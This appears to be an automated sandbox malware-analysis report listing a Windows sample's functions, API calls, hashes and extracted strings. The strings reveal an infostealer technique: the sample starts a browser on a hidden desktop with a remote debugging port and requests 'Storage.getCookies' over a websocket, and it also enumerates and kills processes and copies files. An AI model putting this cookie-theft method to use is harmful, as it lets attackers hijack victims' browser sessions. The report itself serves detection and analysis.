                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: 5a2298d76afe93e21b5884eb27a698b299169cd09e34651abab96f1a94c7af78
                                    • Instruction ID: 89ebd85d01535c5550a658b43206197ebde3b7c5331d8d0bf821ae983e2e9833
                                    • Opcode Fuzzy Hash: 5a2298d76afe93e21b5884eb27a698b299169cd09e34651abab96f1a94c7af78
                                    • Instruction Fuzzy Hash: A4C1B331A112169BCB61EFB8EC99AEF77F8AF11700F440039F84A97652EB30DD458B91
                                    Function 000A9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000A9790
                                    • lstrcat.KERNEL32(?,?), ref: 000A97A0
                                    • lstrcat.KERNEL32(?,?), ref: 000A97B1
                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 000A97C3
                                    • memset.MSVCRT ref: 000A97D7
                                      • Part of subcall function 000C3E70: lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C3EA5
                                      • Part of subcall function 000C3E70: lstrcpy.KERNEL32(00000000,00E69DA8), ref: 000C3ECF
                                      • Part of subcall function 000C3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,000A134E,?,0000001A), ref: 000C3ED9
                                    • wsprintfA.USER32 ref: 000A9806
                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 000A9827
                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 000A9844
                                      • Part of subcall function 000C46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C46B9
                                      • Part of subcall function 000C46A0: Process32First.KERNEL32(00000000,00000128), ref: 000C46C9
                                      • Part of subcall function 000C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 000C46DB
                                      • Part of subcall function 000C46A0: StrCmpCA.SHLWAPI(?,?), ref: 000C46ED
                                      • Part of subcall function 000C46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C4702
                                      • Part of subcall function 000C46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 000C4711
                                      • Part of subcall function 000C46A0: CloseHandle.KERNEL32(00000000), ref: 000C4718
                                      • Part of subcall function 000C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 000C4726
                                      • Part of subcall function 000C46A0: CloseHandle.KERNEL32(00000000), ref: 000C4731
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A9878
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A9889
                                    • lstrcat.KERNEL32(00000000,000D4B60), ref: 000A989B
                                    • memset.MSVCRT ref: 000A98AF
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 000A98D4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A9903
                                    • StrStrA.SHLWAPI(00000000,00E6E0C8), ref: 000A9919
                                    • lstrcpyn.KERNEL32(002D93D0,00000000,00000000), ref: 000A9938
                                    • lstrlen.KERNEL32(?), ref: 000A994B
                                    • wsprintfA.USER32 ref: 000A995B
                                    • lstrcpy.KERNEL32(?,00000000), ref: 000A9971
                                    • Sleep.KERNEL32(00001388), ref: 000A99E7
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A92E1
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A92FA
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A9399
                                      • Part of subcall function 000A92B0: strlen.MSVCRT ref: 000A93E6
                                      • Part of subcall function 000C4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 000C4759
                                      • Part of subcall function 000C4740: Process32First.KERNEL32(00000000,00000128), ref: 000C4769
                                      • Part of subcall function 000C4740: Process32Next.KERNEL32(00000000,00000128), ref: 000C477B
                                      • Part of subcall function 000C4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C479C
                                      • Part of subcall function 000C4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 000C47AB
                                      • Part of subcall function 000C4740: CloseHandle.KERNEL32(00000000), ref: 000C47B2
                                      • Part of subcall function 000C4740: Process32Next.KERNEL32(00000000,00000128), ref: 000C47C0
                                      • Part of subcall function 000C4740: CloseHandle.KERNEL32(00000000), ref: 000C47CB
                                    • CloseDesktop.USER32(?), ref: 000A9A1C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                    • API String ID: 958055206-1862457068
                                    • Opcode ID: 8a8662f7260570ec1e2a8fa715b03129e5bbd86f6e4563cce417e01d0aad1f0b
                                    • Instruction ID: 8f523d1975200dda6671e5a466d3e75e041c975ba6534384afc1442b7ab8ed2a
                                    • Opcode Fuzzy Hash: 8a8662f7260570ec1e2a8fa715b03129e5bbd86f6e4563cce417e01d0aad1f0b
                                    • Instruction Fuzzy Hash: C7917571A10208EFDB50EFA4DC49FDE77B8AF58700F148199F609A7291DF70AE448BA0
                                    Function 000BE210 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 212stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000BE22C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BE243
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BE263
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BE27D
                                    • wsprintfA.USER32 ref: 000BE2A2
                                    • StrCmpCA.SHLWAPI(?,000CCFEC), ref: 000BE2B4
                                    • wsprintfA.USER32 ref: 000BE2D1
                                      • Part of subcall function 000BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 000BEE12
                                    • wsprintfA.USER32 ref: 000BE2F0
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 000BE304
                                    • lstrcat.KERNEL32(?,00E6E548), ref: 000BE335
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BE347
                                    • lstrcat.KERNEL32(?,?), ref: 000BE358
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BE36A
                                    • lstrcat.KERNEL32(?,?), ref: 000BE37E
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000BE394
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE3D2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE422
                                    • DeleteFileA.KERNEL32(?), ref: 000BE45C
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000BE49B
                                    • FindClose.KERNEL32(00000000), ref: 000BE4AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                    • String ID: %s\%s$%s\*$H
                                    • API String ID: 1375681507-1873429620
                                    • Opcode ID: 81088f19483537e991d4dc8729f6c5ee4668cc17a9ad42fc9cc78b54a46778e6
                                    • Instruction ID: 2def16431e877e2edff133d770669fd089dbf56932d8ba7e29736a73eea5b7fc
                                    • Opcode Fuzzy Hash: 81088f19483537e991d4dc8729f6c5ee4668cc17a9ad42fc9cc78b54a46778e6
                                    • Instruction Fuzzy Hash: CE815F71D00218AFCB20EFB4EC49AEE77B9BF54300F4449A9B50A97151EB34AE44CFA0
                                    Function 000BDD30 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 171stringfilememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000BDD45
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000BDD4C
                                    • wsprintfA.USER32 ref: 000BDD62
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BDD79
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BDD9C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BDDB6
                                    • wsprintfA.USER32 ref: 000BDDD4
                                    • DeleteFileA.KERNEL32(?), ref: 000BDE20
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000BDDED
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                      • Part of subcall function 000BD980: memset.MSVCRT ref: 000BD9A1
                                      • Part of subcall function 000BD980: memset.MSVCRT ref: 000BD9B3
                                      • Part of subcall function 000BD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BD9DB
                                      • Part of subcall function 000BD980: lstrcpy.KERNEL32(00000000,?), ref: 000BDA0E
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,00000000), ref: 000BDA1C
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,00E6E098), ref: 000BDA36
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,?), ref: 000BDA4A
                                      • Part of subcall function 000BD980: lstrcat.KERNEL32(?,00E6CDE8), ref: 000BDA5E
                                      • Part of subcall function 000BD980: lstrcpy.KERNEL32(00000000,?), ref: 000BDA8E
                                      • Part of subcall function 000BD980: GetFileAttributesA.KERNEL32(00000000), ref: 000BDA95
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000BDE2E
                                    • FindClose.KERNEL32(00000000), ref: 000BDE3D
                                    • lstrcat.KERNEL32(?,00E6E548), ref: 000BDE66
                                    • lstrcat.KERNEL32(?,00E6D248), ref: 000BDE7A
                                    • lstrlen.KERNEL32(?), ref: 000BDE84
                                    • lstrlen.KERNEL32(?), ref: 000BDE92
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BDED2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                    • String ID: %s\%s$%s\*$H
                                    • API String ID: 4184593125-1873429620
                                    • Opcode ID: 2259a9e0f817e34eb5487815d066b7074eb8392a8eaaea93d6e5ecc5c047fe69
                                    • Instruction ID: c2b36d9a96d3184374d878d7fc5512b0feadde3606f7d1c58dfd60c1a6bc6dc3
                                    • Opcode Fuzzy Hash: 2259a9e0f817e34eb5487815d066b7074eb8392a8eaaea93d6e5ecc5c047fe69
                                    • Instruction Fuzzy Hash: F5614271E11208AFCB10EFB4EC89AEE77B9BF58301F4045AAB54997251EB34EE44CB51
                                    Function 000A16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A16E2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A176C
                                    • lstrcat.KERNEL32(00000000), ref: 000A1776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A17A2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A18F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A18FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat
                                    • String ID: \*.*
                                    • API String ID: 2276651480-1173974218
                                    • Opcode ID: 2d795a0ed514c74ad40d64090a7372789ec38a0dd951cdd5c7430574d51bb8f4
                                    • Instruction ID: fa860b62d46c108df0bb1f814654ff4bd496aba15c564846555288bdb2385d94
                                    • Opcode Fuzzy Hash: 2d795a0ed514c74ad40d64090a7372789ec38a0dd951cdd5c7430574d51bb8f4
                                    • Instruction Fuzzy Hash: 72813031A11216DBCB21EFE8D989AEF77F5AF16701F040129F805AB662DB34DD41CBA1
                                    Function 000BD530 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 183stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000BD54D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BD564
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BD584
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BD59E
                                    • lstrcat.KERNEL32(?,00E6E548), ref: 000BD5E3
                                    • lstrcat.KERNEL32(?,00E6E588), ref: 000BD5F7
                                    • lstrcat.KERNEL32(?,?), ref: 000BD60B
                                    • lstrcat.KERNEL32(?,?), ref: 000BD61C
                                    • lstrcat.KERNEL32(?,000D1794), ref: 000BD62E
                                    • lstrcat.KERNEL32(?,?), ref: 000BD642
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BD682
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BD6D2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000BD737
                                    • FindClose.KERNEL32(00000000), ref: 000BD746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                    • String ID: %s\%s$H
                                    • API String ID: 50252434-75073723
                                    • Opcode ID: 6ff0591dc86897ce45b6b63bf5092a06a0fd941ad86525acb3f7be22e2c8b6bd
                                    • Instruction ID: ded34ac9cce4a72c1b1aa15f36a0467a4aa397ba3a16c25453554995a86d7f84
                                    • Opcode Fuzzy Hash: 6ff0591dc86897ce45b6b63bf5092a06a0fd941ad86525acb3f7be22e2c8b6bd
                                    • Instruction Fuzzy Hash: 15616471D11219AFCB10EFB4DC88ADEB7B4AF59301F0044A6F64997251EB34AE44CF90
                                    Function 000C48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                    • API String ID: 909987262-758292691
                                    • Opcode ID: 80f5f676477a818c3a3616f9dd8b8eac472b73b30050bea4fbfc189da40cf77b
                                    • Instruction ID: b69c400d844ada65acf7b4a033fef36661b133235ace5ed1b663b1439eea4492
                                    • Opcode Fuzzy Hash: 80f5f676477a818c3a3616f9dd8b8eac472b73b30050bea4fbfc189da40cf77b
                                    • Instruction Fuzzy Hash: 93A25A75D012699FDB20CFA8CC94BEDBBB6BF48301F1481AAE518A7241DB716E85CF50
                                    Function 000B23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B23D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B23F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B2402
                                    • lstrlen.KERNEL32(\*.*), ref: 000B240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 000B2436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B2486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
